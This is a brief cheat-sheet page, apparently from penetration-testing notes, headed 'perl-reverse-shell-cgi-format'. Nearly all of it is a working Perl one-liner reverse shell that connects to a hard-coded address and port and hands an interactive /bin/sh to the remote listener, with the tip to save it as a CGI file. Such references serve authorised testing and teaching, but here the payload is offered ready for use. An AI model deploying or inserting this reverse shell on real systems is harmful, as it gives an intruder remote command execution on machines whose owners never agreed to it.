perl-reverse-shell-cgi-format
PERL-REVERSE-SHELL-CGI-FORMAT Save this as a CGI file: - you can always just use a command line as well
perl -e 'use Socket;$i="192.168.30.53";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Last updated
Was this helpful?